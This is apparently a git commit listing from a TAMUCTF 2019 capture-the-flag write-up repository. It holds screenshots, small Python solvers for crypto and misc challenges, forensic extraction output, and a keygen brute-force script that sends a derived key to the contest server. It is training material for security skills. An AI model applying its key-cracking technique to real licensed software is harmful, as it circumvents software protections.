宽度: 885  |  高度: 92  |  大小: 33 KiB

二进制
TAMUCTF/Crypto/Smile/Screenshot_20190302_231451.png 查看文件

之前 之后
宽度: 884  |  高度: 52  |  大小: 20 KiB

二进制
TAMUCTF/Crypto/Smile/Screenshot_20190302_231606.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 57 KiB

二进制
TAMUCTF/Crypto/Smile/Screenshot_20190302_232351.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 75 KiB

二进制
TAMUCTF/Crypto/Smile/Screenshot_20190302_232540.png 查看文件

之前 之后
宽度: 877  |  高度: 50  |  大小: 20 KiB

+ 13
- 0
TAMUCTF/Crypto/Smile/decoder.py 查看文件

@ -0,0 +1,13 @@
from base64 import *
enc = "XUBdTFdScw5XCVRGTglJXEpMSFpOQE5AVVxJBRpLT10aYBpIVwlbCVZATl1WTBpaTkBOQFVcSQdH"
flag = b64decode(enc)
key = ":)"
newflag = []
for i, l in enumerate(flag):
kunci = ord(key[i % len(key)])
cipher = ord(l)
newflag.append(chr(kunci ^ cipher))
newflag = ''.join(newflag)
print newflag

二进制
TAMUCTF/Misc/Hello_World/Screenshot_20190303_161722.png 查看文件

之前 之后
宽度: 1365  |  高度: 665  |  大小: 11 KiB

二进制
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163026.png 查看文件

之前 之后
宽度: 969  |  高度: 612  |  大小: 62 KiB

二进制
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163249.png 查看文件

之前 之后
宽度: 770  |  高度: 611  |  大小: 68 KiB

二进制
TAMUCTF/Misc/Hello_World/Screenshot_20190303_163350.png 查看文件

之前 之后
宽度: 879  |  高度: 31  |  大小: 16 KiB

+ 99
- 0
TAMUCTF/Misc/Hello_World/decoder.py 查看文件

@ -0,0 +1,99 @@
flag = '''push103
push 105
push 103
push 101
push 109
push 123
push 48
push 104
push 95
push 109
push 121
push 95
push 119
push 104
push 52
push 116
push 95
push 115
push 112
push 52
push 99
push 49
push 110
push 103
push 95
push 121
push 48
push 117
push 95
push 104
push 52
push 118
push 51
push 125
push 33
push 101
push 99
push 97
push 112
push 115
push 101
push 116
push 105
push 104
push 119
push 32
push 102
push 111
push 32
push 116
push 111
push 108
push 32
push 97
push 32
push 115
push 105
push 32
push 101
push 114
push 117
push 115
push 32
push 116
push 97
push 104
push 116
push 32
push 44
push 101
push 101
push 103
push 32
push 121
push 108
push 108
push 111
push 103
push 32
push 116
push 101
push 101
push 119
push 115
push 32
push 108
push 108
push 101
push 87
'''
newflag = ""
flag = flag.replace('push', '')
flag = flag.replace('\n', '')
flag = flag.split(" ")
flag = map(int, flag)
for i in flag:
newflag += chr(i)
print newflag

二进制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_155553.png 查看文件

之前 之后
宽度: 879  |  高度: 49  |  大小: 21 KiB

二进制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160033.png 查看文件

之前 之后
宽度: 884  |  高度: 33  |  大小: 10 KiB

二进制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160404.png 查看文件

之前 之后
宽度: 882  |  高度: 216  |  大小: 65 KiB

二进制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160559.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 84 KiB

二进制
TAMUCTF/Misc/I_heard_you_like_files/Screenshot_20190303_160905.png 查看文件

之前 之后
宽度: 882  |  高度: 47  |  大小: 16 KiB

二进制
TAMUCTF/Misc/I_heard_you_like_files/art.png 查看文件

之前 之后
宽度: 1920  |  高度: 1080  |  大小: 3.4 MiB

+ 27
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/audit.txt 查看文件

@ -0,0 +1,27 @@
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File
Foremost started at Sun Mar 3 15:59:09 2019
Invocation: foremost art.png
Output directory: /home/chao/Documents/CTF/TAMUCTF/Misc/I_heard_you_like_files/output
Configuration file: /etc/foremost.conf
------------------------------------------------------------------
File: art.png
Start: Sun Mar 3 15:59:09 2019
Length: 3 MB (3518869 bytes)
Num Name (bs=512) Size File Offset Comment
0: 00006700.zip 86 KB 3430685
1: 00000000.png 3 MB 0 (1920 x 1080)
2: 00006657.pdf 21 KB 3408641
Finish: Sun Mar 3 15:59:09 2019
3 FILES EXTRACTED
zip:= 1
png:= 1
pdf:= 1
------------------------------------------------------------------
Foremost finished at Sun Mar 3 15:59:09 2019

二进制
TAMUCTF/Misc/I_heard_you_like_files/output/pdf/00006657.pdf 查看文件


二进制
TAMUCTF/Misc/I_heard_you_like_files/output/png/00000000.png 查看文件

之前 之后
宽度: 1920  |  高度: 1080  |  大小: 3.3 MiB

二进制
TAMUCTF/Misc/I_heard_you_like_files/output/zip/00006700.zip 查看文件


+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/[Content_Types].xml 查看文件

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="png" ContentType="image/png"/><Default Extension="jpeg" ContentType="image/jpeg"/><Override PartName="/_rels/.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/><Override PartName="/word/_rels/document.xml.rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/media/image1.png" ContentType="image/png"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/>
</Types>

+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/_rels/.rels 查看文件

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/app.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template></Template><TotalTime>12</TotalTime><Application>LibreOffice/6.1.1.2$Linux_X86_64 LibreOffice_project/10$Build-2</Application><Pages>1</Pages><Words>4</Words><Characters>24</Characters><CharactersWithSpaces>27</CharactersWithSpaces><Paragraphs>1</Paragraphs></Properties>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/docProps/core.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dcterms:created xsi:type="dcterms:W3CDTF">2018-09-20T15:47:36Z</dcterms:created><dc:creator></dc:creator><dc:description></dc:description><dc:language>en-US</dc:language><cp:lastModifiedBy></cp:lastModifiedBy><dcterms:modified xsi:type="dcterms:W3CDTF">2018-09-20T16:00:01Z</dcterms:modified><cp:revision>1</cp:revision><dc:subject></dc:subject><dc:title></dc:title></cp:coreProperties>

+ 1
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/not_the_flag.txt 查看文件

@ -0,0 +1 @@
Sorry, no flag here

+ 3
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/_rels/document.xml.rels 查看文件

@ -0,0 +1,3 @@
<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/>
</Relationships>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/document.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14 wp14"><w:body><w:p><w:pPr><w:pStyle w:val="TextBody"/><w:widowControl/><w:pBdr></w:pBdr><w:spacing w:before="0" w:after="225"/><w:ind w:left="0" w:right="0" w:hanging="0"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Open Sans;Arial;sans-serif" w:hAnsi="Open Sans;Arial;sans-serif"/><w:b w:val="false"/><w:i w:val="false"/><w:caps w:val="false"/><w:smallCaps w:val="false"/><w:color w:val="000000"/><w:spacing w:val="0"/><w:sz w:val="21"/></w:rPr></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Open Sans;Arial;sans-serif" w:hAnsi="Open Sans;Arial;sans-serif"/><w:b w:val="false"/><w:i w:val="false"/><w:caps w:val="false"/><w:smallCaps w:val="false"/><w:color w:val="000000"/><w:spacing w:val="0"/><w:sz w:val="21"/></w:rPr><w:drawing><wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2"><wp:simplePos x="0" y="0"/><wp:positionH relativeFrom="column"><wp:align>center</wp:align></wp:positionH><wp:positionV relativeFrom="paragraph"><wp:posOffset>635</wp:posOffset></wp:positionV><wp:extent cx="2857500" cy="1600200"/><wp:effectExtent l="0" t="0" r="0" b="0"/><wp:wrapSquare wrapText="largest"/><wp:docPr id="1" name="Image1" descr=""></wp:docPr><wp:cNvGraphicFramePr><a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/></wp:cNvGraphicFramePr><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="1" name="Image1" descr=""></pic:cNvPr><pic:cNvPicPr><a:picLocks noChangeAspect="1" noChangeArrowheads="1"/></pic:cNvPicPr></pic:nvPicPr><pic:blipFill><a:blip r:embed="rId2"></a:blip><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr bwMode="auto"><a:xfrm><a:off x="0" y="0"/><a:ext cx="2857500" cy="1600200"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:anchor></w:drawing></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr></w:r></w:p><w:p><w:pPr><w:pStyle w:val="Normal"/><w:rPr></w:rPr></w:pPr><w:r><w:rPr></w:rPr><w:t>Wait...now I am confused...</w:t></w:r></w:p><w:sectPr><w:type w:val="nextPage"/><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:left="1134" w:right="1134" w:header="0" w:top="1134" w:footer="0" w:bottom="1134" w:gutter="0"/><w:pgNumType w:fmt="decimal"/><w:formProt w:val="false"/><w:textDirection w:val="lrTb"/></w:sectPr></w:body></w:document>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/fontTable.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><w:font w:name="Times New Roman"><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Symbol"><w:charset w:val="02"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="Arial"><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/></w:font><w:font w:name="DejaVu Serif"><w:charset w:val="01"/><w:family w:val="roman"/><w:pitch w:val="variable"/></w:font><w:font w:name="DejaVu Sans"><w:charset w:val="01"/><w:family w:val="swiss"/><w:pitch w:val="variable"/></w:font><w:font w:name="Open Sans"><w:altName w:val="Arial"/><w:charset w:val="01"/><w:family w:val="auto"/><w:pitch w:val="default"/></w:font></w:fonts>

二进制
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/media/image1.png 查看文件

之前 之后
宽度: 300  |  高度: 168  |  大小: 83 KiB

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/settings.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:zoom w:percent="100"/><w:defaultTabStop w:val="709"/></w:settings>

+ 2
- 0
TAMUCTF/Misc/I_heard_you_like_files/output/zip/word/styles.xml 查看文件

@ -0,0 +1,2 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="w14"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:kern w:val="2"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/></w:rPr></w:rPrDefault><w:pPrDefault><w:pPr><w:widowControl/></w:pPr></w:pPrDefault></w:docDefaults><w:style w:type="paragraph" w:styleId="Normal"><w:name w:val="Normal"/><w:qFormat/><w:pPr><w:widowControl/></w:pPr><w:rPr><w:rFonts w:ascii="DejaVu Serif" w:hAnsi="DejaVu Serif" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:color w:val="auto"/><w:kern w:val="2"/><w:sz w:val="24"/><w:szCs w:val="24"/><w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Heading"><w:name w:val="Heading"/><w:basedOn w:val="Normal"/><w:next w:val="TextBody"/><w:qFormat/><w:pPr><w:keepNext w:val="true"/><w:spacing w:before="240" w:after="120"/></w:pPr><w:rPr><w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:eastAsia="Noto Sans" w:cs="Noto Sans"/><w:sz w:val="28"/><w:szCs w:val="28"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="TextBody"><w:name w:val="Body Text"/><w:basedOn w:val="Normal"/><w:pPr><w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/></w:pPr><w:rPr></w:rPr></w:style><w:style w:type="paragraph" w:styleId="List"><w:name w:val="List"/><w:basedOn w:val="TextBody"/><w:pPr></w:pPr><w:rPr></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Caption"><w:name w:val="Caption"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/><w:spacing w:before="120" w:after="120"/></w:pPr><w:rPr><w:i/><w:iCs/><w:sz w:val="24"/><w:szCs w:val="24"/></w:rPr></w:style><w:style w:type="paragraph" w:styleId="Index"><w:name w:val="Index"/><w:basedOn w:val="Normal"/><w:qFormat/><w:pPr><w:suppressLineNumbers/></w:pPr><w:rPr></w:rPr></w:style></w:styles>

+ 10
- 0
TAMUCTF/Reverse/KeyGenMe/.gdb_history 查看文件

@ -0,0 +1,10 @@
pdisas main
b *main+200
r
pdisas verify_key
b *verify_key+96
r
pdisas verify_key
b *verify_key+96
r
r

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233546.png 查看文件

之前 之后
宽度: 563  |  高度: 369  |  大小: 13 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_233856.png 查看文件

之前 之后
宽度: 878  |  高度: 152  |  大小: 43 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234341.png 查看文件

之前 之后
宽度: 433  |  高度: 144  |  大小: 4.8 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_234432.png 查看文件

之前 之后
宽度: 429  |  高度: 263  |  大小: 8.3 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190302_235534.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 74 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000342.png 查看文件

之前 之后
宽度: 886  |  高度: 63  |  大小: 14 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_000843.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 139 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001206.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 133 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001324.png 查看文件

之前 之后
宽度: 536  |  高度: 77  |  大小: 9.1 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001417.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 132 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_001835.png 查看文件

之前 之后
宽度: 1032  |  高度: 610  |  大小: 131 KiB

二进制
TAMUCTF/Reverse/KeyGenMe/Screenshot_20190303_002033.png 查看文件

之前 之后
宽度: 879  |  高度: 77  |  大小: 17 KiB

+ 20
- 0
TAMUCTF/Reverse/KeyGenMe/bruteforce.py 查看文件

@ -0,0 +1,20 @@
from pwn import *
v5 = ""
v2 = ord('H')
flag = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
key = "[OIonU2_<__nK<KsK"
iterator = 0
while True:
for i in flag:
if(((ord(i) + 12) * v2 + 17) % 70 + 48) == ord(key[iterator]):
v5 += i
v2 = ord(key[iterator])
iterator += 1
break
if(len(v5) == len(key)):
break
v5 = v5[:-1]
print "Key: {}".format(v5)
r = remote("rev.tamuctf.com", 7223)
r.sendline(v5)
r.interactive()

二进制
TAMUCTF/Reverse/KeyGenMe/keygenme 查看文件


二进制
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153550.png 查看文件

之前 之后
宽度: 649  |  高度: 591  |  大小: 79 KiB

二进制
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_153910.png 查看文件

之前 之后
宽度: 636  |  高度: 625  |  大小: 89 KiB

二进制
TAMUCTF/Secure_Coding/SQL/Screenshot_20190303_154148.png 查看文件

之前 之后
宽度: 805  |  高度: 521  |  大小: 70 KiB

二进制
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_202844.png 查看文件

之前 之后
宽度: 1365  |  高度: 702  |  大小: 71 KiB

二进制
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203307.png 查看文件

之前 之后
宽度: 1363  |  高度: 336  |  大小: 77 KiB

二进制
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203644.png 查看文件

之前 之后
宽度: 1365  |  高度: 334  |  大小: 206 KiB

二进制
TAMUCTF/Web/Many_Gigems_To_You/Screenshot_20190302_203910.png 查看文件

之前 之后
宽度: 1366  |  高度: 274  |  大小: 136 KiB

二进制
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200611.png 查看文件

之前 之后
宽度: 404  |  高度: 298  |  大小: 17 KiB

二进制
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200703.png 查看文件

之前 之后
宽度: 397  |  高度: 311  |  大小: 18 KiB

二进制
TAMUCTF/Web/Not_Another_SQLi_Challenge/Screenshot_20190302_200832.png 查看文件

之前 之后
宽度: 488  |  高度: 101  |  大小: 17 KiB

二进制
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201534.png 查看文件

之前 之后
宽度: 1364  |  高度: 702  |  大小: 750 KiB

二进制
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_201719.png 查看文件

之前 之后
宽度: 565  |  高度: 181  |  大小: 23 KiB

二进制
TAMUCTF/Web/Robots_Rule/Screenshot_20190302_202358.png 查看文件

之前 之后
宽度: 901  |  高度: 168  |  大小: 34 KiB

正在加载...
取消
保存